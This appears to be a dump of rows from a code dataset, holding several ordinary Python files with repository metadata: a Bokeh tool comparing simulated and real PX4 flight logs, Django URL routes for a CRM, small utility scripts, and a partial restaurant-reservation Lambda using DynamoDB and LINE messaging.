pd_real2 = temp_pd_real.loc[(temp_pd_real['time'] >= real_mission_start) & (temp_pd_real['time'] <= real_mission_end)] # slice this just to the mission portion
pd_real = pd_real2.copy()
starting_real_time = pd_real.iat[0,0]
pd_real['time'] -= starting_real_time # zero base the time
pd_real_time['time'] = pd_real['time']
pd_real = pd_real.drop(columns=['time']) # we don't need these old time columns anymore
else:
pd_sim = pd.DataFrame(sim_data, columns = ['sim'])
pd_sim_time = pd.DataFrame(sim_time,columns = ['time'])
starting_sim_time = pd_sim_time.iat[0,0]
pd_sim_time['time'] -= starting_sim_time # zero base the time
pd_real = pd.DataFrame(real_data, columns = ['real'])
pd_real_time = pd.DataFrame(real_time, columns = ['time'])
starting_real_time = pd_real_time.iat[0,0]
pd_real_time['time'] -= starting_real_time # zero base the time
pd_real_time.dropna(subset=['time'], inplace=True) # remove empty rows
pd_real.reset_index(drop=True, inplace=True) # reset all the indicies to zero
pd_real_time.reset_index(drop=True, inplace=True)
pd_sim_time.dropna(subset=['time'], inplace=True) # do the same for the sims
pd_sim.reset_index(drop=True, inplace=True)
pd_sim_time.reset_index(drop=True, inplace=True)
if len(pd_sim_time) > len(pd_real_time): # base the time axis on the longer of the two logs
pd_time = pd_sim_time
else:
pd_time = pd_real_time
new_data = pd.concat([pd_time,pd_sim, pd_real], axis=1)
save_settings(config)
return new_data
def update_config():
config[0] = simname
config[1] = realname
config[2] = sim_metric
config[3] = real_metric
config[4] = simdescription
config[5] = realdescription
config[6] = 0
config[7] = 0
return config
def save_settings(config):
with open('settings', 'wb') as fp: #save state
pickle.dump(config, fp)
def read_settings():
''' We're now going to load a bunch of state variables to sync the app back to the last known state. The file "settings" should exist in the main directory
# config = [simname, realname, sim_metric, real_metric, simdescription, realdescription]
The format of the list is as follows:
config[0] = sim ID
config[1] = real ID
config[2] = sim_metric
config[3] = real_metric
config[4] = simdescription
config[5] = realdescription
config[6] = real_reverse_button.active
config[7] = sim_reverse_button.active
'''
global simname, realname, sim_metric, real_metric, simdescription, realdescription, real_reverse_button, sim_reverse_button
if path.exists('settings'):
with open ('settings', 'rb') as fp:
config = pickle.load(fp)
simname = config[0]
realname = config[1]
sim_metric = config[2]
real_metric = config[3]
simdescription = str(config[4])
realdescription = str(config[5])
# real_reverse_button.active = config[5]
# sim_reverse_button.active = config[6]
else: # the app is running for the first time, so start with dummy data
simname = "sim.ulg"
realname = "real.ulg"
sim_metric = 'x'
real_metric = 'x'
simdescription = "Dummy simulation data"
realdescription = "Dummy real data"
config = update_config()
print("Starting with dummy data", config)
return config
def get_mission_mode(flight_mode_changes):
# time_offset, null = flight_mode_changes[0] # zero base the time
m_start = 0
m_end = 0
for i in range(len(flight_mode_changes)-1):
t_start, mode = flight_mode_changes[i]
# t_start = t_start - time_offset
t_end, mode_next = flight_mode_changes[i + 1]
# t_end = t_end - time_offset
if mode in flight_modes_table:
mode_name, color = flight_modes_table[mode]
if mode_name == 'Mission':
m_start = int(t_start)
m_end = int(t_end)
return m_start, m_end
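# Note on get_mission_mode above: if a log contains several Mission segments, the
# loop keeps overwriting m_start/m_end, so only the last Mission segment is returned.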
def plot_flight_modes(flight_mode_changes,type):
global annotations, mission_annotations, annotation_counter, mission_annotation_counter, sim_label, real_label, labels, ts1
if mission_only:
for i in range(annotation_counter):
annotations[i].visible = False # turn off the previous annotations
for j in range(len(labels)): # Turn off the previous labels
labels[j].visible = False
if type == 'sim':
real_label.visible = True # now just turn on the two mission mode labels
else:
sim_label.visible = True
labels_y_pos = []
labels_x_pos = []
labels_text = []
labels_color = []
added_box_annotation_args = {}
if type == 'sim':
labels_y_offset = tplot_height - 300 # plot the sim shaded areas below the real ones
else:
labels_y_offset = tplot_height - 200
time_offset, null = flight_mode_changes[0] # zero base the time
for i in range(len(flight_mode_changes)-1):
t_start, mode = flight_mode_changes[i]
t_start = t_start - time_offset
t_end, mode_next = flight_mode_changes[i + 1]
t_end = t_end - time_offset
if mode in flight_modes_table:
mode_name, color = flight_modes_table[mode]
if mission_only:
if mode_name == 'Mission':
mtime_offset = t_start
mt_start = 0 # zero base mission mode
mt_end = t_end - mtime_offset
annotation = BoxAnnotation(left=int(mt_start), right=int(mt_end), top = labels_y_offset, bottom = labels_y_offset-100,
fill_alpha=0.09, line_color='black', top_units = 'screen',bottom_units = 'screen',
fill_color=color, **added_box_annotation_args)
annotation.visible = True
mission_annotations.append(annotation) # add the box to the list of annotations, so we can remove it if necessary later
mission_annotation_counter = mission_annotation_counter + 1 # increment the list of annotations
ts1.add_layout(annotation)
else:
annotation = BoxAnnotation(left=int(t_start), right=int(t_end), top = labels_y_offset, bottom = labels_y_offset-100,
fill_alpha=0.09, line_color='black', top_units = 'screen',bottom_units = 'screen',
fill_color=color, **added_box_annotation_args)
annotation.visible = True
annotations.append(annotation) # add the box to the list of annotations, so we can remove it if necessary later
annotation_counter = annotation_counter + 1 # increment the list of annotations
ts1.add_layout(annotation)
if flight_mode_changes[i+1][0] - t_start > 1e6: # filter fast
# switches to avoid overlap
if type == 'sim':
labels_text.append(mode_name)
else:
labels_text.append(mode_name)
labels_x_pos.append(t_start)
labels_y_pos.append(labels_y_offset)
labels_color.append(color)
# plot flight mode names as labels
if len(labels_text) > 0:
source = ColumnDataSource(data=dict(x=labels_x_pos, text=labels_text,
y=labels_y_pos, textcolor=labels_color))
if type == 'sim':
label_color = 'orange'
else:
label_color = 'blue'
if mission_only:
if mode_name == 'Mission':
label = Label(x=t_start, y=labels_y_offset, text='Mission', # just create a single label for each mission mode
y_units='screen', level='underlay',
render_mode='canvas',
text_font_size='10pt',
text_color= label_color, text_alpha=0.85,
background_fill_color='white',
background_fill_alpha=0.8, angle=90, angle_units = 'deg', text_align='right', text_baseline='top')
if type == 'sim':
sim_label = label
else:
real_label = label
ts1.add_layout(label)
else:
label = LabelSet(x='x', y='y', text='text', # create a whole label set
y_units='screen', level='underlay',
source=source, render_mode='canvas',
text_font_size='10pt',
text_color= label_color, text_alpha=0.85,
background_fill_color='white',
background_fill_alpha=0.8, angle=90/180*np.pi,
text_align='right', text_baseline='top')
labels.append(label)
ts1.add_layout(label)
def update(selected=None):
global reverse_sim_data, reverse_real_data, datalog, original_data, datasource, ts1, get_new_data
clear_boxes() #turn off old mode displays
if get_new_data:
print("Fetching new data", simname, realname, sim_metric, real_metric, read_file)
original_data = get_data(simname, realname, sim_metric, real_metric, read_file)
datalog = copy.deepcopy(original_data)
get_new_data = False
if reverse_sim_data:
datalog[['sim']] = sim_polarity * original_data['sim'] # reverse data if necessary
reverse_sim_data = False
if reverse_real_data:
datalog['real'] = real_polarity * original_data['real']
reverse_real_data = False
# range = datalog[['real']].max(numeric_only = True) - datalog[['real']].min(numeric_only = True)
range = 1
if ts1.y_range.end != None:
range = ts1.y_range.end - ts1.y_range.start
trend = get_trend(datalog)
trend = trend * int(range/10) # scale the trend line to roughly 10% of the overall range
pd_trend = pd.DataFrame(trend, columns = ['trend'])
datalog = pd.concat([datalog, pd_trend], axis=1)
position = get_displacement(datalog)
position = position/5 # scaled
pd_position = pd.DataFrame(position, columns = ['position'])
datalog = pd.concat([datalog, pd_position], axis=1)
datasource.data = datalog
plot_flight_modes(sim_flight_mode_changes, 'sim')
plot_flight_modes(real_flight_mode_changes, 'real')
config = update_config()
stats.text, stats2.text = get_stats(datalog)
save_settings(config)
def prep_for_stats(datalog):
sim = datalog[['sim']].to_numpy()
real = datalog[['real']].to_numpy()
sim = sim[~np.isnan(sim)] # eliminate any NaNs
real = real[~np.isnan(real)]
min_size = min(sim.size, real.size) # shrink the longer one so it's the same size as the smaller one
real = real[:min_size]
sim = sim[:min_size]
return real, sim
def get_displacement(datalog):
real, sim = prep_for_stats(datalog)
return sim - real
def get_trend(datalog):
real, sim = prep_for_stats(datalog)
sim_trend = simstats.rate_of_change(sim)
real_trend = simstats.rate_of_change(real)
trend_diff = sim_trend - real_trend
return trend_diff
def get_stats(datalog):
thiel = simstats.sim2real_stats(datalog)
song = simstats.sim2real_stats2(datalog)
real, sim = prep_for_stats(datalog) # this just cleans up the data so it wil work with the stats libraries
trend = simstats.equation_8(real,sim) # find trend correlate
print("trend= ", trend)
position = simstats.position_metric(real, sim, 1) # find position correlate
print("position =", position)
thiel_text = 'Thiel coefficient (1 = no correlation, 0 = perfect): ' + str(thiel)
song_text = 'Song coefficient (0 = perfect): ' + str(song)
return thiel_text, song_text
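# For reference, a common form of the Thiel (Theil) inequality coefficient used by
# get_stats above is
#   U = sqrt(mean((sim - real)**2)) / (sqrt(mean(sim**2)) + sqrt(mean(real**2)))
# which is 0 for a perfect match and approaches 1 as correspondence degrades; the
# actual computation here is delegated to the project's simstats module.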
def normalize():
global datalog, realnorm, simnorm, get_new_data, norm
if (normalize_mode_button.active == 1):
norm = True
realnorm = 0
simnorm = 0
sim_mean = datalog['sim'].mean() # get the average
real_mean = datalog['real'].mean()
if sim_mean >= real_mean:
realnorm = sim_mean - real_mean
datalog['real'] = datalog['real'] + realnorm # increase the lower one by the average of their difference
else:
simnorm = real_mean - sim_mean
datalog['sim'] = datalog['sim'] + simnorm
else:
norm = False
datalog['real'] = datalog['real'] - realnorm # revert to the way they were
datalog['sim'] = datalog['sim'] - simnorm
get_new_data = False
update()
def clear_boxes():
global annotations, mission_annotations
for i in range(mission_annotation_counter):
mission_annotations[i].visible = False # turn off the previous mission annotations
for j in range(annotation_counter):
annotations[j].visible = False # turn off the previous other mode annotations
def mission_mode():
global mission_only, get_new_data
if (mission_mode_button.active == 1):
mission_only = True
print("Show only missions")
else:
mission_only = False
print("Show all modes")
get_new_data = True
normalize_mode_button.active = 0
update()
def reverse_sim():
global sim_polarity, reverse_sim_data, config
if (sim_reverse_button.active == 1):
sim_polarity = -1
config[7] = sim_reverse_button.active # index 7 holds the sim orientation (see read_settings)
else: sim_polarity = 1
reverse_sim_data = True
normalize_mode_button.active = 0
update()
def reverse_real():
global real_polarity, reverse_real_data, config
if (real_reverse_button.active == 1):
real_polarity = -1
config[6] = real_reverse_button.active # index 6 holds the real orientation; index 5 is realdescription
else: real_polarity = 1
reverse_real_data = True
normalize_mode_button.active = 0
update()
def swap_sim():
global sim_metric, get_new_data
print("Swapping sim. Metric is", sim_metric)
if sim_metric == 'x':
sim_metric = 'y'
else:
sim_metric = 'x'
get_new_data = True
normalize_mode_button.active = 0
update()
def swap_real():
global real_metric, get_new_data
print("Swapping real. Metric is", real_metric)
if real_metric == 'x':
real_metric = 'y'
else:
real_metric = 'x'
get_new_data = True
normalize_mode_button.active = 0
update()
def sim_change(attrname, old, new):
global sim_metric, real_metric, read_file, config, get_new_data
print("Sim change:", new)
sim_metric = new
real_metric = new
config[2] = sim_metric # save state
config[3] = real_metric # save state
get_new_data = True
read_file = True
normalize_mode_button.active = 0
update()
def get_thiel_analysis_plots(simname, realname):
global datalog, original_data, datasource, layout, ts1, chart, annotation_counter
additional_links= "<b><a href='/browse?search=sim'>Load Simulation Log</a> <p> <a href='/browse?search=real'>Load Real Log</a></b>"
save_settings(config)
datalog = get_data(simname, realname, sim_metric, real_metric, read_file)
original_data = copy.deepcopy(datalog)
for i in range(10):
if keys[i][0] == 'x':
found_x = i
datatype = Select(value='x', options=keys[found_x])
datatype.on_change('value', sim_change)
intro_text = Div(text="""<H2>Sim/Real Thiel Coefficient Calculator</H2> \
<p> Load two PX4 datalogs, one a real flight and the other a simulation of that flight, \
and see how well they compare. We use the well-known <a href="https://www.vosesoftware.com/riskwiki/Thielinequalitycoefficient.php">Thiel Coefficient</a> and <a href="https://drive.google.com/file/d/1XY8aZz89emFt-LAuUZ2pjC1GHwRARr9f/view">Song variation</a> of that to generate correspondence scores. Our Jupyter Notebook that demonstrates and explains the Song methodology is <a href="https://github.com/zlite/PX4_flight_review/blob/master/thiel_app/clean_replication.ipynb">here</a>""",width=800, height=120, align="center")
choose_field_text = Paragraph(text="Choose a data field to compare:",width=500, height=15)
links_text = Div(text="<table width='100%'><tr><td><h3>" + "</h3></td><td align='left'>" + additional_links+"</td></tr></table>")
datasource = ColumnDataSource(data = dict(time=[],sim=[],real=[],trend=[],position=[]))
datasource.data = datalog
tools = 'xpan,wheel_zoom,reset'
ts1 = figure(plot_width=tplot_width, plot_height=tplot_height, tools=tools, x_axis_type='linear')
# ts1.add_layout(Legend(), 'right') # if you want the legend outside of the plot
print("real description", realdescription)
ts1.line('time','sim', source=datasource, line_width=3, color="orange", legend_label="Simulated data: "+ simdescription)
ts1.line('time','real', source=datasource, line_width=3, color="blue", legend_label="Real data: " + realdescription)
ts1.line('time','trend', source=datasource, line_width=1, color="green", legend_label="Difference in trend (scaled)")
ts1.line('time','position', source=datasource, line_width=1, color="red", line_dash = 'solid', legend_label="Difference in position (scaled)")
ts1.legend.background_fill_alpha = 0.7 # make the background of the legend more transparent
ts1.add_layout(Title(text="Time (seconds)", align="center"), "below")
# annotation_counter = annotation_counter + 1 # increment the list of annotations
# x_range_offset = (datalog.last_timestamp - datalog.start_timestamp) * 0.05
# x_range = Range1d(datalog.start_timestamp - x_range_offset, datalog.last_timestamp + x_range_offset)
plot_flight_modes(sim_flight_mode_changes, 'sim')
plot_flight_modes(real_flight_mode_changes, 'real')
# set up layout
widgets = column(datatype,stats,stats2)
mission_button = column(mission_mode_button)
normalize_button = column(normalize_mode_button)
sim_button = column(sim_reverse_button)
real_button = column(real_reverse_button)
sswap_button = column(sim_swap_button)
rswap_button = column(real_swap_button)
rule = column(explainer)
space = column(spacer)
main_row = row(widgets)
chart = column(ts1)
buttons = column(mission_button, normalize_button, space, sim_button, sswap_button, rule, real_button, rswap_button)
layout = column(main_row, chart, buttons)
# initialize
update()
curdoc().add_root(intro_text)
curdoc().add_root(links_text)
curdoc().add_root(choose_field_text)
curdoc().add_root(layout)
curdoc().title = "Flight data"
print("Now starting Thiel app")
GET_arguments = curdoc().session_context.request.arguments
config = read_settings()
print("simname is", simname, "realname is", realname)
if GET_arguments is not None and 'log' in GET_arguments:
log_args = GET_arguments['log']
if len(log_args) == 1:
templog_id = str(log_args[0], 'utf-8')
file_details = templog_id.split('desc:')
templog_id = file_details[0]
if (templog_id.find("sim") != -1):
log_id = templog_id.replace('sim','')
print("This is a sim file. New log ID=", log_id)
ulog_file_name = get_log_filename(log_id)
simname = os.path.join(get_log_filepath(), ulog_file_name)
simdescription = str(file_details[1])
elif (templog_id.find("real") != -1):
log_id = templog_id.replace('real','')
print("This is a real file. New log ID=", log_id)
ulog_file_name = get_log_filename(log_id)
realname = os.path.join(get_log_filepath(), ulog_file_name)
realdescription = str(file_details[1])
else:
if not validate_log_id(templog_id):
raise ValueError('Invalid log id: {}'.format(log_id))
print('GET[log]={}'.format(templog_id))
ulog_file_name = get_log_filename(templog_id)
get_thiel_analysis_plots(simname, realname) | 41.426848 | 538 | 0.6547 | 3,694 | 27,466 | 4.634001 | 0.154304 | 0.014605 | 0.023835 | 0.00888 | 0.358745 | 0.29209 | 0.231452 | 0.212057 | 0.186646 | 0.160007 | 0 | 0.011825 | 0.245686 | 27,466 | 663 | 539 | 41.426848 | 0.814413 | 0.137625 | 0 | 0.258189 | 0 | 0.007707 | 0.104175 | 0.00549 | 0.001927 | 0 | 0 | 0 | 0 | 1 | 0.040462 | false | 0.001927 | 0.061657 | 0 | 0.119461 | 0.030829 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5c7806917d8c3147196ffa048e504ff3cd7f109 | 952 | py | Python | leads/urls.py | imchandr/django-crm | 67df86fa954101eabefdaa51cd4f718e9bb86be2 | [
"MIT",
"Unlicense"
] | null | null | null | leads/urls.py | imchandr/django-crm | 67df86fa954101eabefdaa51cd4f718e9bb86be2 | [
"MIT",
"Unlicense"
] | 1 | 2021-11-20T17:50:36.000Z | 2021-11-20T17:51:05.000Z | leads/urls.py | imchandr/django-crm | 67df86fa954101eabefdaa51cd4f718e9bb86be2 | [
"MIT",
"Unlicense"
] | null | null | null | from django.urls import path
from .views import (
lead_create, lead_list, lead_details, lead_create,lead_update,lead_delete,
LeadListView,
LeadDetailsView, LeadCreateView,
LeadUpdateView,LeadDeleteView,
AssignAgentView,
CategoryListView,
# CategoryDetailView
)
app_name = "leads"
urlpatterns = [
path('',LeadListView.as_view(), name='lead-list'),
path('create/', LeadCreateView.as_view(), name='lead-create'),
path('<int:pk>',LeadDetailsView.as_view(), name='lead-details'),
path('<int:pk>/assign-agent/',AssignAgentView.as_view(), name='assign-agent'),
path('<int:pk>/update/',LeadUpdateView.as_view(), name='lead-update'),
path('<int:pk>/delete/', LeadDeleteView.as_view(), name='lead-delete'),
path('categories/', CategoryListView.as_view(), name='category-list'),
#path('categories/<int:pk>/', CategoryDetailView.as_view(), name='category-detail'),
]
| 31.733333 | 88 | 0.676471 | 105 | 952 | 5.990476 | 0.314286 | 0.076312 | 0.127186 | 0.111288 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152311 | 952 | 29 | 89 | 32.827586 | 0.77943 | 0.106092 | 0 | 0 | 0 | 0 | 0.193396 | 0.025943 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.105263 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5ca9a9099f02b0a997c7320aa921922873e7a7d | 282 | py | Python | exercise4-4.py | raygomez/python-exercise-4 | 5f4fdb23767f1cc04dc133497b866dfa9feeb7f9 | [
"MIT"
] | null | null | null | exercise4-4.py | raygomez/python-exercise-4 | 5f4fdb23767f1cc04dc133497b866dfa9feeb7f9 | [
"MIT"
] | null | null | null | exercise4-4.py | raygomez/python-exercise-4 | 5f4fdb23767f1cc04dc133497b866dfa9feeb7f9 | [
"MIT"
] | null | null | null | from __future__ import print_function
__author__ = 'ragomez'
def f(data):
mylist = xrange(0, data)
for i in mylist:
if ((i % 5) == 0) and ((i % 7) == 0):
yield i
number = int(raw_input('Enter a number:'))
for num in f(number):
print(num, end=',') | 20.142857 | 45 | 0.570922 | 43 | 282 | 3.511628 | 0.674419 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02439 | 0.27305 | 282 | 14 | 46 | 20.142857 | 0.712195 | 0 | 0 | 0 | 0 | 0 | 0.081272 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.1 | 0 | 0.2 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5cace1f3781638ae4c1f8b7b3c9dd3d8c717941 | 624 | py | Python | helpers/io_helper.py | muhlar/quant-reseach | b9f9a9cde94bf0ebb3d809240cc7542dfcbf7634 | [
"MIT"
] | 56 | 2019-06-14T18:05:28.000Z | 2022-01-24T15:32:40.000Z | helpers/io_helper.py | muhlar/quant-reseach | b9f9a9cde94bf0ebb3d809240cc7542dfcbf7634 | [
"MIT"
] | 1 | 2020-04-01T09:31:04.000Z | 2020-04-01T12:32:31.000Z | helpers/io_helper.py | muhlar/quant-reseach | b9f9a9cde94bf0ebb3d809240cc7542dfcbf7634 | [
"MIT"
] | 33 | 2019-06-19T13:27:31.000Z | 2022-01-25T23:57:17.000Z | import os
def check_path(path, create_if_not_exist=True):
if not os.path.exists(path) and create_if_not_exist == True:
os.makedirs(path)
return True
elif not os.path.exists(path) and create_if_not_exist == False:
return False
def list_files_in_path_os(path, filename_prefix="", filename_suffix="", recursive=True):
while path[-1] == "/":
path = path[:-1]
all_files = []
for (dirpath, dirnames, fname) in os.walk(path):
all_files.extend([dirpath + "/" + el for el in fname if filename_prefix in el and filename_suffix in el])
if recursive == False:
break
all_files = sorted(all_files)
return all_files | 32.842105 | 107 | 0.725962 | 102 | 624 | 4.215686 | 0.343137 | 0.093023 | 0.076744 | 0.111628 | 0.232558 | 0.176744 | 0.176744 | 0.176744 | 0.176744 | 0.176744 | 0 | 0.003781 | 0.152244 | 624 | 19 | 108 | 32.842105 | 0.809074 | 0 | 0 | 0 | 0 | 0 | 0.0032 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.058824 | 0 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5cc5404833e8916cb271ba99462a3cbdbb519ef | 12,977 | py | Python | backend/APP/reservation_put/reservation_put.py | cvc-Fujii/line-api-use-case-reservation-Restaurant | 248ae2ed52d8325d17d2ddbbd2975068381193fe | [
"Unlicense"
] | 8 | 2021-05-21T03:10:12.000Z | 2022-01-09T10:10:26.000Z | backend/APP/reservation_put/reservation_put.py | cvc-Fujii/line-api-use-case-reservation-Restaurant | 248ae2ed52d8325d17d2ddbbd2975068381193fe | [
"Unlicense"
] | null | null | null | backend/APP/reservation_put/reservation_put.py | cvc-Fujii/line-api-use-case-reservation-Restaurant | 248ae2ed52d8325d17d2ddbbd2975068381193fe | [
"Unlicense"
] | 4 | 2021-05-28T09:57:52.000Z | 2021-09-27T12:25:54.000Z | import logging
import json
import os
import datetime
import flex_message_builder
from common import (common_const, line, utils)
from validation.restaurant_param_check import RestaurantParamCheck
# Import the DynamoDB access classes
from common.channel_access_token import ChannelAccessToken
from common.remind_message import RemindMessage
from restaurant.restaurant_reservation_info import RestaurantReservationInfo
from restaurant.restaurant_shop_reservation import RestaurantShopReservation
from restaurant.restaurant_shop_master import RestaurantShopMaster
# Environment variables
REMIND_DATE_DIFFERENCE = int(os.getenv('REMIND_DATE_DIFFERENCE'))
CHANNEL_ID = os.getenv('OA_CHANNEL_ID')
LIFF_CHANNEL_ID = os.getenv('LIFF_CHANNEL_ID')
# Logging configuration
LOGGER_LEVEL = os.environ.get("LOGGER_LEVEL")
logger = logging.getLogger()
if LOGGER_LEVEL == 'DEBUG':
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
# Constant declarations
THIRTY_MINUTES = datetime.timedelta(minutes=30)
ONE_WEEK = datetime.timedelta(days=7)
JST_UTC_TIMEDELTA = datetime.timedelta(hours=9)
VACANCY_FLG_MAP = {'AVAILABLE_NOTHING': 0,
'AVAILABLE_MUCH': 1, 'AVAILABLE_FEW': 2}
RESERVED_PROPORTION_MAP = {'RESERVED_MUCH': 0.8, 'RESERVED_FULL': 1}
ON_DAY_REMIND_DATE_DIFFERENCE = 0
# Initialize the table access classes
shop_master_table_controller = RestaurantShopMaster()
reservation_info_table_controller = RestaurantReservationInfo()
shop_reservation_table_controller = RestaurantShopReservation()
channel_access_token_table_controller = ChannelAccessToken()
message_table_controller = RemindMessage()
def put_customer_reservation_info(body, shop_info):
"""
Register the reservation in the customer reservation info table.
Parameters
----------
body : dict
Reservation details selected by the user
shop_info: dict
Information about the shop being reserved
Returns
-------
reservation_id: str
ID that uniquely identifies the reservation
"""
customer_reservation_item = {
"shop_id": body['shopId'],
"shop_name": body['shopName'],
"user_id": body['userId'],
"user_name": body['userName'],
"course_id": body['courseId'],
"course_name": body['courseName'],
"reservation_people_number": body['reservationPeopleNumber'],
"reservation_date": body['reservationDate'],
"reservation_starttime": body['reservationStarttime'],
"reservation_endtime": body['reservationEndtime'],
"amount": get_course_price(shop_info, body['courseId']),
}
reservation_id = reservation_info_table_controller.put_item(
**customer_reservation_item)
return reservation_id
def get_course_price(shop_info, course_id):
"""
Get the course price from the shop info table.
Parameters
----------
shop_info: dict
Shop info fetched for the given shop_id
course_id : int
ID of the course being reserved
Returns
-------
course_price: int
Price of the course
"""
course_price = [course_list['price']
for course_list in shop_info['course']
if course_list['courseId'] == course_id]
if not course_price:
return 0
return course_price[0]
def put_shop_reservation_info(body, shop_info):
"""
Register the reservation on the shop's calendar.
If a record already exists for the given date, update it;
if not, insert a new one.
Parameters
----------
body : dict
Reservation details selected by the user
shop_info: dict
Shop info fetched for the given shop_id
"""
# Look up whether a record exists for this shopId and reservation date
reservation_item = shop_reservation_table_controller.get_item(
body['shopId'], body['reservationDate'])
new_reservation_list, new_total_reserved_number = divide_thirty_minutes(
body['reservationStarttime'], body['reservationEndtime'],
body['reservationPeopleNumber']
)
# Compute the shop's daily reservable capacity: seats * number of 30-minute slots in the business hours
openTime = datetime.datetime.strptime(
shop_info['shop']['openTime'], "%H:%M")
closeTime = datetime.datetime.strptime(
shop_info['shop']['closeTime'], "%H:%M")
restaurant_open_term = int((closeTime - openTime) / THIRTY_MINUTES)
max_reservable_number = int(
shop_info['shop']['seatsNumber']) * restaurant_open_term
# if -> a record exists for the given reservation date: update it
# else -> no record exists for the given reservation date: create a new one
if reservation_item:
# To merge the new data with the existing data, build a lookup keyed by
# reservation start time, with each slot's reservation info as the value.
start_time_index = {}
for reserved_time_info in reservation_item['reservedInfo']:
start_time_index[reserved_time_info['reservedStartTime']
] = reserved_time_info
# if -> the time slot already has reservations: add the head count
# else -> the time slot has no reservations: append it as a new slot
for new_reservation_info in new_reservation_list:
reservation_start_time = new_reservation_info['reservedStartTime']
if reservation_start_time in start_time_index:
start_time_index[reservation_start_time]['reservedNumber'] +=\
new_reservation_info['reservedNumber']
else:
start_time_index[reservation_start_time] = new_reservation_info
# Compute the day's total reservations and their ratio to seat capacity (used when rendering calendar availability)
sum_total_reserved_number = reservation_item['totalReservedNumber'] + \
new_total_reserved_number
reserved_proportion = sum_total_reserved_number / max_reservable_number
key = {
'shop_id': body['shopId'],
'reserved_day': body['reservationDate']
}
update_value = {
'reserved_info': list(start_time_index.values()),
'total_reserved_number': sum_total_reserved_number,
'vacancy_flg': get_vacancy_flg(reserved_proportion)
}
shop_reservation_table_controller.update_item(**key, **update_value)
else:
# Compute the ratio of total reservations to seat capacity (used when rendering calendar availability)
reserved_proportion = new_total_reserved_number / max_reservable_number
new_reservation_item = {
'shop_id': body['shopId'],
'reserved_day': body['reservationDate'],
'reserved_year_month': utils.format_date(body['reservationDate'],
'%Y-%m-%d', '%Y-%m'),
'reserved_info': new_reservation_list,
'total_reserved_number': new_total_reserved_number,
'vacancy_flg': get_vacancy_flg(reserved_proportion),
}
shop_reservation_table_controller.put_item(**new_reservation_item)
def divide_thirty_minutes(reservation_start_time, reservation_end_time,
reservation_people_number):
"""
Split a reservation spanning multiple hours into 30-minute units and
return them as a list. Data: start time, end time, head count.
Parameters
----------
reservation_start_time : str
Requested start time of the reservation
reservation_end_time : str
Requested end time of the reservation
reservation_people_number : int
Number of people in the reservation
Returns
-------
reservation_info_list: list
Reservation info split into 30-minute units.
Every time slot carries the same head count.
total_people_number: int
Sum of the head counts over the 30-minute slots
"""
start_time = datetime.datetime.strptime(
reservation_start_time, "%H:%M")
end_time = datetime.datetime.strptime(
reservation_end_time, "%H:%M")
thirty_minutes = datetime.timedelta(minutes=30)
    # Split the time range into 30-minute slots and build the list.
reservation_info_list = []
tmp_start_time = start_time
tmp_end_time = start_time + thirty_minutes
total_people_number = 0
while tmp_end_time <= end_time:
reservation_info = {
'reservedStartTime': tmp_start_time.strftime('%H:%M'),
'reservedEndTime': tmp_end_time.strftime('%H:%M'),
'reservedNumber': reservation_people_number
}
reservation_info_list.append(reservation_info)
total_people_number += reservation_people_number
tmp_start_time += thirty_minutes
tmp_end_time += thirty_minutes
return reservation_info_list, total_people_number
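# Illustrative sketch (assumed inputs, not part of the original module):
# divide_thirty_minutes('18:00', '19:30', 2) returns three 30-minute slots
# (18:00-18:30, 18:30-19:00, 19:00-19:30), each with reservedNumber 2,
# together with the total of 6.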
def get_vacancy_flg(reserved_proportion):
"""
予約割合から判断し、空き状況のフラグを取得する。
Parameters
----------
reserved_proportion : float
予約数/席数で計算した予約済み率
Returns
-------
vacancy_flg: int
空き状況フラグ
"""
    if reserved_proportion < RESERVED_PROPORTION_MAP['RESERVED_MUCH']:
        vacancy_flg = VACANCY_FLG_MAP['AVAILABLE_MUCH']
    elif reserved_proportion < RESERVED_PROPORTION_MAP['RESERVED_FULL']:
        vacancy_flg = VACANCY_FLG_MAP['AVAILABLE_FEW']
    else:
        vacancy_flg = VACANCY_FLG_MAP['AVAILABLE_NOTHING']
    return vacancy_flg
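# Threshold sketch (assumed map values for illustration): with
# RESERVED_PROPORTION_MAP = {'RESERVED_MUCH': 0.5, 'RESERVED_FULL': 1.0},
# a proportion of 0.3 maps to AVAILABLE_MUCH, 0.7 to AVAILABLE_FEW,
# and 1.0 or more to AVAILABLE_NOTHING.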
def create_flex_message(body, remind_date_difference):
"""
LINEメッセージで送信するフレックスメッセージを作成する
Parameters
----------
body : dict
メッセージ送信にuser_id等の必要なデータ
remind_date_difference : int
リマインドを送信する日付と当日の差分
Returns
-------
flex_message : str
フレックスメッセージの形式に整形したjson型データ
"""
reservation_datetime = body['reservationDate'] + ' ' + \
body['reservationStarttime'] + '-' + body['reservationEndtime']
flex_prm = {'shop_name': body['shopName'],
'reservation_date': reservation_datetime,
'course_name': body['courseName'],
